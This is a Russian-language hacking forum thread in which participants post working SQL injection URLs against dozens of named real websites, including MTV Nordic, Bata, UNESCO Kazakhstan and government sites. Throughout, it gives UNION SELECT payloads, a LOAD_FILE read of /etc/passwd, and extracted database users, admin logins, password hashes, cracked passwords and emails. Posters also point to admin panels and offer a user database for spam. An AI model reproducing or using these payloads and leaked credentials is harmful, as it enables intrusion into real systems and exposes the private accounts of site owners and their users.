http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

mtv.dk
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

musictelevision.fi
http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845
ко всем одно
5.0.37-log:mtvnordicadmin@172.23.59.249:mtvnordic

mtv.se
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

mtve.com
http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

mtv.no
http://www.mtv.no/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

mtv.dk
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

musictelevision.fi
http://www.musictelevision.fi/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845
ко всем одно
5.0.37-log:mtvnordicadmin@172.23.59.249:mtvnordic

http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=-1+union+select+1,2,concat_ws(0x3a,user,password),4 +from+mysql.user/*

root:0fdf9cda19d19c10

http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=-1+union+select+1,2,LOAD_FILE(CHAR(47,101,116,99,47 ,112,97,115,115,119,100)),4/*

в исходнике )

http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,username,password),3,4+from+baltic_ph pmotion.admin/*
admin:adminpass
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,user_name,password),3,4+from+baltic_p hpmotion.member_profile/*

http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,username,password),3,4+from+fiat.user s+limit+0,1/*
admin:25e4ee4e9229397b6b17776bfceaf8e7:adminpass
http://www.mtv.dk/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1,co ncat_ws(0x3a,login,password),3,4+from+gudrumogidas .gidas_cms_users+limit+0,1
admin:indigovaldas
кароче там очень много всего можно найти .. лень .. основное есть ..
там только 60 табл в которых есть колонка password :D

http://zito.mvs.gov.ua/?page=3&id=-639+union+select+1,2,3,4,5,6,7/*

http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,4,5/*

Админка
http://www.bocharik.ru/admin

Версия
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(version()+using+koi8r ),5/*

Юзер
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(user()+using+koi8r),5/*

Имя бд
http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(DATABASE()+using+koi8 r),5/*


Спасибо, nex0 je0n

http://www.bocharik.ru/tv/index.php?id=-4+UNION+SELECT+1,2,3,convert(concat_ws(0x3a,userna me,user_password)+using+koi8r),5+from+phpbb_users+ where+user_level=1+limit+0,1/*
/admin/ - пасс от форума,которого нет, подойдет к админке
Bocharik:94edcb5a40e5cb07f1428ded09fc62b7:gjlpfvrj v
to /admin/ - admin:gjlpfvrjv

PR 2
http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())/*version(): 5.0.24a-standard-log
user(): jpthome@lankershim.dreamhost.com
database(): jpthome
http://jptweb.com/projects/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+null,2,3,4,concat(username,0x3a,pas sword)+from+jos_users/*admin:9b9b2642fd71dc42744cba369fb22120


PR 2
http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus&id=-3+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--&Itemid=3version(): 5.0.58
user(): pinklady@localhost
database(): pinklady
http://www.pinkladylegend.com/index.php?option=com_jabode&task=sign&sign=taurus&id=-3+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+FROM+jos_users--&Itemid=3admin:9f751204e5080f66b7c5d77c0791ca8d:3wm SYj6vHBRkaick


PR 2
http://www.l2u.co.uk/index.php?option=com_jabode&task=sign&sign=leo&id=-2+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())&Itemid=151version(): 4.1.20-community-nt
user(): locallytoyou@localhost
database(): locallytoyou


PR 2
http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--version(): 5.0.24a-standard-log
user(): soul@apache2-cabo.fiero.dreamhost.com
database(): soul
http://soulwithstyle.com/index.php?option=com_jabode&task=sign&sign=leo&id=-4+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+from+jos_users--admin:0f138c43fd44179b1380f1f0aaf88e3c:NGLGxwIecZY qjkOM


PR 0 ='(
http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=capricorn&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--version(): 4.1.22-standard
user(): chsalum_joom1@localhost
database(): chsalum_joom1
http://charlestownalumni.net/cms/index.php?option=com_jabode&task=sign&sign=capricorn&id=-4+union+select+1,2,3,4,concat(username,0x3a,passwo rd)+FROM+jos_users--chsalum:7e027f88756af54c4e987d13395b7fbf:ZjMUi8erH WoIxFey


PR 0 ='(
http://www.latvianusa.com/index.php?option=com_jabode&task=sign&sign=sagittarius&id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database())--&Itemid=999version(): 4.1.22-standard
user(): latvianu_jUser@localhost
database(): latvianu_joomlaDB

PR 0

http://jacellular.com/main/index.php?option=com_jabode&task=sign&sign=cancer&id=-4+union+select+1,2,3,4,concat_ws(0x3a3a,version(), %20user(),database())--


version() : 5.0.45-community-log
user() : jacellul_joom1@localhost
database() : jacellul_joom1

thnx to gisTy

http://cjcity.ru/base/song.php?id=1'+UNION+SELECT+1,2,3,concat_ws(0x3a,u sername,password,icq,email),5+from+users/*

Лиса аж подвисла ненадолго от кол-ва или хз от чего =)

Если кому уж очень надо эту базу(5908 юзверей) (для спама или вообще хз для чего) то просто стукните в личку я скину в .txt... Ну думаю никому и не надо :rolleyes:

http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+select+1,2,version(),4,5,u ser(),7,8,9,10
cпс jokester
НИмогу капнутЬ дальше
version(): 4.1.21
user() :rgufk@localhost

http://www.bedro1075.co.kr/bbs1/login.php?id=issue&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&s_url=%2Fbbs1%2Fview.php%3Fid%3Dissue%26no%3D2

дальше не знаю как- я еще ток начал....

PR 4
определяем кол-во колонок:
http://www.loglar.com/song.php?id=12198+order+by+8/*
но при запросе
http://www.loglar.com/song.php?id=-12198+union+select+1,2,3,4,5,6,7,8/* нам ничего не выводит, так как вывод ошибок отключен.. следовательно можно предположить что версия мускула - 3.ъ, т.к. в ней не былшо конструкции union.. кто раскрутит до конца отпишитесь, просто самому уже интересно

PR 4
http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,ver sion(),user(),database())--version(): 5.0.51-2.dotdeb.0-log
user(): lyricsprovider@localhost
database(): lyricsprovider
http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,null,null,6,concat_ws(0x3a 3a,fldAuto,name,pwd,admin,emailaddress,fullname)+f rom+lyricsprovider.ads_user--3 юзверя..http://www.lyricsprovider.com/song.php?id=-3377+union+select+1,2,3,null,null,6,concat_ws(0x2e ,guest_email)+from+lyricsprovider.guests--вот тут уже побольше будет, но тут в основном тольок мыльники

PR 3
http://www.harptabs.com/song.php?ID=-164+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, version(),user(),database()),10,11,12,13,14,15,16, 17/*version(): 5.0.45-community-log
user(): harptabs_harptab@localhost
database(): harptabs_com
http://www.harptabs.com/song.php?ID=-164+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a, Username,Password,Email),10,11,12,13,14,15,16,17+f rom+harptabs_com.Member+limit+5939,1/*в базе 5939 записи=) сливайте, юзайте=)

PR 3
http://www.vietsky.com/music/song.php?id=-6254+union+select+1,concat_ws(0x3a3a,version(),use r(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29/*version(): 4.1.22-standarđlog
user(): vietsky_khoalan@localhost
database(): vietsky_music

PR 2
http://demoscene.stg7.net/lyrics/song.php?id=-50+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11/*version():5.0.24a-standard-log
user(): stage7@temple.dreamhost.com
dtatabase(): demolyrics

PR 2
http://duhovskoi.ru/songs/song.php?id=-38+union+select+1,2,3,4,concat_ws(0x3a3a3a,version (),user(),database()),6,7,8,9/*version(): 4.1.21-community-max-nt-log
user(): 1gb_duhovskoi@10.0.1.17
database(): 1gb_duhovskoi

PR 0 ='(
http://fungens.com/generators/poll/poll.php?action=show_results&poll_id=-13+union+select+concat_ws(0x3a3a,version(),user(), database()),2/*version(): 5.0.45-log
user():dbo225707050@74.208.16.77
database(): db225707050
бд почти пустая.. там есть одна табличка.. да и та не интересная..

PR: 1
http://www.oke.ru/xo4u.php?id=-42708+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.oke.ru/xo4u.php?id=-42708+union+select+1,2,version(),4,User(),6,7,8,9, 10/*
User:gsokecomru@localhost
Version:5.1.16-beta-log
-------------------------------------------------------------
PR: 7
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,2,3,4,5,6,7/*
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,version(),user(),4,5,6,7/*
User:dbo158065722@212.227.118.42
Version:5.0.45-log
-------------------------------------------------------------
PR: 7
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+1,2/*
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+user(),version()/*
User:linspire@10.0.0.205
Version:4.0.24-standard-log
-------------------------------------------------------------
MSSQL_InJection:
PR: 6
http://www.thechicagocouncil.org/dynamic_page.php?id=64'
-------------------------------------------------------------
PR: 6
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,unhex(hex(concat_ws(0x3a,Versi on(),user()))),4,5,6,7,8,9,10,11/*
User:wfsj@localhost
Version:4.1.7-nt
-------------------------------------------------------------
PR: 5
http://www.thejerusalemfund.org/images/informationbrief.php?ID=-192+union+select+concat_ws(0x3a,version(),user())/*
User:hijab@localhost
Version:4.0.27-log
-------------------------------------------------------------
PR: 6
http://www.choices.edu/resources/detail.php?id=-49+union+select+1,convert(concat_ws(0x3a,version() ,user())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26/*
User:choices@charlie.services.brown.edu
Version:4.1.14-log
-------------------------------------------------------------
PR: 6
http://www.allianceforbiz.com/events/specific_event.php?id=-89+union+select+concat_ws(0x3a,version(),user()),2 ,3,4,5,6,7,8,9/*
User:alliance_shows@localhost
Version:4.1.22-standard
-------------------------------------------------------------
PR: 5
http://www.fip.org/CONGRESS/beijing2007/index.php?id=-600+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20/*http://www.fip.org/CONGRESS/beijing2007/index.php?id=-600+union+select+user(),2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20/*
User:fip@localhost
Version:4.1.20
---------------------------------------------------------------
PR: 6
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,version(),1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*
Version:5.0.22-Debian_0ubuntu6.06.10-log
User:eutrsite@localhost
Все таблицы:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,table_name,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+informatio n_schema.tables+limit+18,1/*
Тут порядком 60 мыльников:
http://www.eutrainingsite.com/open_details.php?id=-19+union+select+1,concat_ws(0x3a,id,email,password ),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1+from+cusers+where+id=1/*
community@eutrainingsite.com:comm08em
----------------------------------------------------------------
http://www.michaelpollan.com/article.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,10/*
-----------------------------------------------------------------
PR: 5
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(version()+using+lati n1),5,6,7,8,9,10,11/*
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,concat_ws(0x3a,id,username,p assword,email),5,6,7,8,9,10,11+from+users+where+id =1/*
admin:4dm1n {админку я так и не нашел,может пароль к ftp подойдет,но я даже пробовал =)}
----------------------------------------------------------------
http://www.clasp.org/publications.php?id=-6+union+select+1,2,version(),4,5,6,7,8,9,10,1,1,1, 1,1/*

http://www.phpbuddy.com/article.php?id=999999999+union+select+1,2,3,4,5,6/*
Поля и таблицы не смог подобрать:(

ukrgazeta.plus.org.ua

PR 3

http://ukrgazeta.plus.org.ua/print.php?ida=99999999999+union+select+1,2,3,user( ),version(),database()/*

Подобрал только одну таблицу: article(ida,text)

http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,table_name,5+from+information _schema.tables+where+table_name+like+0x25757365722 5/*

http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_ password,user_email,user_icq),5+from+piter_phpbb_u sers/*

Страшный случай. Смотрим в исходном коде :) Лучше для этого юзать SQL inj tools ИМХО

SUBJECT617
http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_ password,user_email,user_icq),5+from+nn_phpbb_user s/*
вот это правильная база.)

agamemn0n
http://www.abc-english-grammar.com/forum/questions.asp?lesson=1+or+1=(SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME +NOT+IN+('views'))--
продолжай..)

agamemn0n
продолжай..)
может я чего то не понимаю, но ты перейди по той ссылке, что ты дал..
там вообще есть возможность инъекта?

HairStylesDesign.com - PR 5
http://www.hairstylesdesign.com/gallery/fiche.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*
есть таблица users, но поля не угалал..(

http://prepadav.net/view_sellers_work.php?sel=1'+union+select+user_ password+from+ phpbb_users+where+user_id='3

Fauvel.fr - pr 4
http://www.fauvel.fr/carrelage/web/catalogue/fiche.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5/*

вывод в index:
<li><a href="3" target="_blank">4.0.18-log:fauvel_db:fauvel@localhost</a></li>

http://auto.tbroker.ru/showauto.php?ID=99999999999999+union+select+1,2,3, password,login,6,7,8,USER(),10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+ from+users+limit+3.1/*

Это по круче будет))))Админку сами ищите

www.fruity-mail.ru
http://www.fruity-mail.ru/catalog.php?id=13&subid=20%27
version: 5.0.45
user: u12625_frumail@10.10.12.63
database: u12625_frumail

http://www.fruity-mail.ru/catalog.php?id=13&subid=20+union+select+1,concat_ws(0x3a,name,login, password,email),3+from+frumail_admins/*

сегодня у нас .FR

Univ-paris13.fr - pr 6
http://www.univ-paris13.fr/formationsUP13/form/fiche.php?id=99999'+union+select+1,concat_ws(0x3a, version()),3/*
Wildside.fr - pr 5
http://www.wildside.fr/video/fiche.php?id=999999+union+select+concat_ws(0x3a,ve rsion(),database(),user()),2,3/*
Gedeonprogrammes.com - pr 5
http://www.gedeonprogrammes.com/en/fiche.php?annee=&id=999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,concat_ws(0x3a,version(),databas e(),user())/*
Amis-musees.fr - pr 4
http://www.amis-musees.fr/sams/fiche.php?id=9999999+UNION+SELECT+version(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31/*
Prettypictures.fr - p4
http://www.prettypictures.fr/fiche.php?id=999999+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
и еще..)

Lowriderteeshirt.ch pr 5
http://www.lowriderteeshirt.ch/Fiche.php?Rub=TSM&ID=9999999'+union+select+1,concat_ws(0x3a,username ,password),3+from+emp3p_admins/*

http://www.kultprosvet.ru/text.php?t=-1+union+select+1,concat_ws(0x3a,lgn,pass)+from+clt _users+limit+1,1/*

SHA-1 пасс - FaileR1

Infos-Villes.com - PR 5
http://www.infos-villes.com/fiche.php?id=441003&num=893499+union+select+1,2,3,4,5,6,7,8,9,10,conca t_ws(0x3a,login,password),12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29+from+users+where+id= 1/*
/admin.php
http://www.infos-villes.com/fiche.php?id=441003&num=893499+union+select+1,2,3,4,5,6,7,8,9,10,conca t_ws(0x3a,name,pass),12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29+from+thyme_Users+where+ac cess_lvl=1/*
Ukhairdressers.com - pr 5
http://www.ukhairdressers.com/p_links/display.asp?company=1+or+1'
непохек..)

http://www.dpmhi.com/news.php?id=-1+union+select+all+1,2,concat_ws(0x3a,version(),us er(),database()),4,5--

http://www.jleen.com/page.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3--

Тыц - тыц ...

http://lib.kstu.kz/site/library/index.php?page=lib_1&news=-37+union+select+1,2,concat(user(),char(58),version (),char(58),database()),4,5/*

http://tecnics.net.ru/?id=-1+UNION+SELECT+1,CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User())/*

http://budinfo.dp.ua/cgi-bin/org.php?id=7%20AND%201=2%20UNION%20SELECT%20concat (0x3c62723e,concat_ws(0x3a,user_level,username,use r_password)),2,3,4,5,6,7,8%20from%20phpbb_users/*

http://millery.kiev.ua/Razdel-1.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3/*
millery_millery@localhost:4.1.22-standard-log:millery_millery

http://www.ortho.ru/baza/kat-1.php?id=-1+union+select+1--

http://configdesign.com/1.php?id=-1+union+select+1,2,user(),database(),version(),6/*

manholec_3@209.68.2.76

manholec_projects

4.1.20-log

http://www.jonathan-lane.com/nutcracker-detail-1.php?ID=-1+union+select+1,2%20--

Сорьке админку не нашёл... =\

http://www.tarazinfo.kz/index.php?action=discuss&newsid=-1+union+select+1,2,3,concat(login),5,6,password,8, 9+from+admins/*

up : *2206Up*
Banzai : 7777777

никакой ценности но всё же :)
http://invest-zp.org.ua/?go=news&nomid=761%20AND%201=2%20UNION%20ALL%20SELECT%201,n ame,value,4,5,6,7,8,database(),0,1,2,3,4,5%20from% 20options/*
судя по
http://invest-zp.org.ua/templates/
и
http://invest-zp.org.ua/includes/
это чудовище сделано на базе какого-то шопа ... но админку я как-то не нашёл (если она там есть конечно)

www.apc.ru
http://www.apc.ru/cgi-bin/news_full.cgi?id=-263+union+select+1,2,3,concat(name,':',password,': ',email),5,6+from+forum_user/*

User: u57851@10.10.227.59
Version: 5.0.45-log
тИЦ ресурса: 6200

Адрес: www.meteoprog.com.ua (82.144.221.182)

Google PR 5 / 10
Яндекс тИЦ 1600

version() - 5.11
Поля(важные):login,password
http://www.meteoprog.com.ua/strana.php?ctryid=-70+union+select+login+from+access_admins+limit+0,1--

Админка: (https://forum.antichat.ru/showpost.php?p=757149&postcount=508)

http://www.meteoprog.com.ua/admin

Добавлено:
Упс.. вот это я нашел в антибояне.. Но как видете версия бд, движок изменился.
29.02.2008
//***********************************
ТОЧНЫЙ ПРОГНОЗ ПОГОДЫ ДЛЯ ЛЮБОЙ ТОЧКИ УКРАИНЫ

http://meteoprog.com.ua/news.php?command=more&id_news=-64+union+select+1,2,database(),user(),5,6/*

4.1.22
meteoprog
meteoprog@localhost

Тынц.... =\

www.kpla.kz

http://www.kpla.kz/news.php?id=3+union+select+1,2,3,4,concat(version( ),char(58),user(),char(58),database()),6/*

4.1.22-standard
kplakz_admin@localhost
kplakz_main

....

http://oblstat.kz/ru/news.php?id=-123+union+select+1,2,3,concat(version( ),char(58),user(),char(58),database()),5,6,7/*

Version: 4.1.20
User: ubase@localhost
Database: u-oblstat_stat

unesco.kz


http://women.unesco.kz/news.php?id=-2+union+select+version()/*
http://women.unesco.kz/news.php?id=-2+union+select+concat(login,char(58),pwd)+from+use rs+limit+2,1/*


XaHyMaH:654321
Mitya:19761213
uhska:unska1
tgpekma:yfh83pekkftdf
tjpekmabz:yeh83pek
kg;b,tr:rfxb82tdf
uzyfhubpf:uek65zv
pelmabz:zulfiya

Админку не нашёл ... =\

1) 2005arl.unesco.kz
2) agroweb.unesco.kz
3) aralmodel.unesco.kz
4) aralvision.unesco.kz
5) arral2005.unesco.kz
6) csmrk.unesco.kz
7) dlnet.unesco.kz
8) dtnet.unesco.kz
9) econet.unesco.kz
10) freesoft.unesco.kz
11) heritagenet.unesco.kz
12) i-k.museum.unesco.kz
13) kazscinet.unesco.kz
14) kyrnatcom.unesco.kz
15) libportal.unesco.kz
16) mow.unesco.kz
17) museolog.unesco.kz
18) nat.unesco.kz
19) natcom.unesco.kz
20) odl.unesco.kz
21) oer.unesco.kz
22) otrar.unesco.kz
23) peace.agrow.unesco.kz
24) peace.unesco.kz
25) qypchaq.unesco.kz
26) server.unesco.kz
27) source.unesco.kz
28) teleinvivo.unesco.kz
29) unesco.kz
30) water.unesco.kz
31) women.unesco.kz

slider, ты конечно извини.. может быть я чего-то не понимаю.. но там есть кнопочка edit...

www.klincity.ru
http://www.klincity.ru/index.php?area=1&p=user&id=-1+union+select+1,2,3,4/*

www.klincity.ru
Тут нету скули...

Тут нету скули...
там есть скуля

http://www.klincity.ru/index.php?showfile=1&fid=471&p=downloads&area=1&categ=-7+union+select+1,version(),3/*

там есть скуля
Я имел ввиду id

www.comingsoon.net


Database Version: 4.1.22
Database name: comingso_nextra
User name: comingso_nextra@csn-node3-int

http://www.comingsoon.net/films.php?id=15813+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,Version(),0x2F2A2A2F,Database(), 0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x 71)+LIMIT+1,1--

вывод в мета тэгах
<meta name="DESCRIPTION" content="xsqlinjbegin4.1.22/**/comingso_nextra/**/comingso_nextra@csn-node3-intxsqlinjend">
<meta name="KEYWORDS" content="xsqlinjbegin4.1.22/**/comingso_nextra/**/comingso_nextra@csn-node3-intxsqlinjend">
sql-inj tool испробывал ))

Dimi4 убрал бы 0x7873716C696E6A626567696E.... лишнее

Dimi4 ,посмотри страниц 5-6 назад , я кидал пак , там я уже его ломал =\\

маленькая порция от меня=)

PR 5
http://www.shop.oxfordancestors.com/index.php?cat_id=-6+union+select+concat_ws(0x3a3a,version(),user(),d atabase()),2,3,4,5,6,7,8/*&catname='5%20Gifts'
version(): 4.0.27-standard
user(): conway_oxanshop@localhost
database(): conway_oashop

так же есть раскрытие путей до домашней папки:
/hsphere/local/home/conway/shop.oxfordancestors.com/index.php
Apache/1.3.34

PR 4
http://www.ianshop.com/shop_category.php?cat_id=-4+union+select+concat_ws(0x3a3a,version(),user(),d atabase())--
version(): 5.0.51a-community
user(): ianshop@localhost
database(): ianshop_wordpress
есть раскрытие путей до домашнего каталога:
/home/ianshop/public_html/shop_category.php
Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6

PR 1
http://www.dilemma.ru/shop/shop_display_products.php?cat_id=282222+union+sele ct+concat(version(),0x3a3a,user(),0x3a3a,database( )),2,3,4,5,6,7,8/*
version(): 5.0.45-log
user(): u8509@10.10.223.235
database(): u8509

PR N/A
https://secure6.eliteukserve.net/philip19secure/shop-us/products.php?cat_id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a3a,ve rsion(),user(),database()))),5,6,7,8,9/*
version(): 4.1.16-standard
user(): philip19_db1_rt@europa.eliteukserve.net
database(): philip19_db1

gisTy
http://www.ianshop.com/shop_category.php?cat_id=-4+union+select+concat_ws(0x3a,username,password)+f rom+ianshop_wordpress.shop_admin--
/admin
http://www.ianshop.com/shop_category.php?cat_id=-4+union+select+concat_ws(0x3a,user_login,user_pass )+from+ianshop_wordpress.wp_users--
/blog/wp-login.php

http://www.lawfirm.ru/article/index.php?id=-326+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0/*
лень крутить было , кто докрутит напишите в личку )

какбы без полей вывода.... (мб я просто ненашел)
http://favicon.yandex.net/favicon/www.earthfiles.com/www.earthfiles.com

Google PR 6 / 10

http://www.earthfiles.com/news.php?ID=1434+union+select+1,2,3,4--

+ че сегодня за день??? :confused:
http://www.marvelultimatealliance.com/news.php?id=200'+union+select+1,2,3,4,5,6,7,8/*

2 Dimi4
Вывод есть ,только с извратами :)

ID должно быть положительным , поэтому and, и 2 столбец должен содержать существующее значение .Ветка пятая вывод в title.

_http://www.earthfiles.com/news.php?ID=1434+and+1=2+union+select+1,version(), 3,concat_ws(0x3a,User(),Database(),Version())+from +information_schema.tables--

funnymoneyreport.com (70.87.174.182)



database() roguegov_rgov

version() 4.1.22-standard

user() roguegov_publicr@localhost

TABLE_NAME news
;)
http://www.funnymoneyreport.com/news.php?id=-7465+union+select+database(),version(),user(),4,5, 6/*

http://www.ci.bremerton.wa.us/display.php?id=2+union+select+1,2,unhex(hex(versio n())),4,5,6,7,8,9,10,11,12,13,14--

http://www.lggroup.us

http://www.lggroup.us/news.php?id=-2+union+select+1,2,concat(user,0x3a,pass),4,5+from +users--

lgg:dancing5678

bata.com (213.30.168.66)

Database Version: 5.0.15-nt
Database name: bata-com
User name: prod-bata-com@localhost

Вот это я понимаю удобно, вывод без ограничений :)

http://www.bata.com/news/news/news.php?id=448/**/union/**/select/**/1,2,3,TABLE_NAME,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,50/*

Интересные таблицы:

a_users_f

a_groups_f

Вывод всех полей:

http://www.bata.com/news/news/news.php?id=448/**/union/**/select/**/1,2,3,COLUMN_NAME,5,6,7,8,9/**/from/**/information_schema.columns/**/where/**/TABLE_NAME='a_users_f'/**/limit/**/1,20/*

us_id
us_gr_id
us_login
us_password
us_email
us_fname
us_lname
us_company
us_ri_id
us_createddate
us_modifieddate
us_lastlogon
us_modified
us_deleted
us_ts

Собстна юзеры:


http://www.bata.com/news/news/news.php?id=448/**/union/**/select/**/1,2,3,concat_ws(0x203a203a20,us_id,us_login,us_pas sword,us_email),5,6,7,8,9/**/from/**/a_users_f/**/limit/**/1,20/*


1 : : ldehon : : 250cf8b51c773f3f8dc8b4be867a9a02 : : ldehon@i-puzzle.fr
2 : : test : : 098f6bcd4621d373cade4e832627b4f6 : : test@aol.com
3 : : lboulet : : b555f4a2901228cc826327079761e696 : : laurence.boulet@bata.com
4 : : rsp : : 250cf8b51c773f3f8dc8b4be867a9a02 : :
5 : : csp : : 250cf8b51c773f3f8dc8b4be867a9a02 : :

найденные пароли (первая пятерка):

1 : : ldehon : : 456 : : ldehon@i-puzzle.fr

2 : : test : : test : : test@aol.com

3 : : lboulet : : 6880 : : laurence.boulet@bata.com

4 : : rsp : : 456 : :

5 : : csp : : 456 : :

Мистика каято.. у большинства пароль 456 :confused:

сайт налоговой милиции в одессе
http://www.nalog.od.ua/a.php?article_id=4680&rid=-1+union+select+1,2,3,4,column_name,6,7,8+from+info rmation_schema.columns+where+table_name=0x75736572 +limit+1,1--

gangs - менты это хорошо..
http://www.nalog.od.ua/a.php?article_id=4680&rid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8+from+nalogod_.user--
админка: /edit

natasha:0444730b0844225c - ************

Grey: Тема не для вопросов.

http://www.prokuratura-kamchatka.ru/?id=7+and+1=0+union+select+1,concat_ws(0x3a,user_l evel,user_id),concat_ws(0x3a,username,user_email,u ser_password,user_avatar)+from+phpbb_users+where+u ser_level%3E0+limit+1,1
5.0.45-log
http://vestipk.ru/forum/admin
vestipk:f00bb259f87de37586b7b51c2fee1dd6:dtnth
==================================================
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,password),binary),5,6,7,8,9,0,1+from+users/*
4.1.11-Debian_4sarge7
admin:m3mph15
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,user_password),binary),5,6,7,8,9,0,1+from+phpb b_users+limit+1,1/*
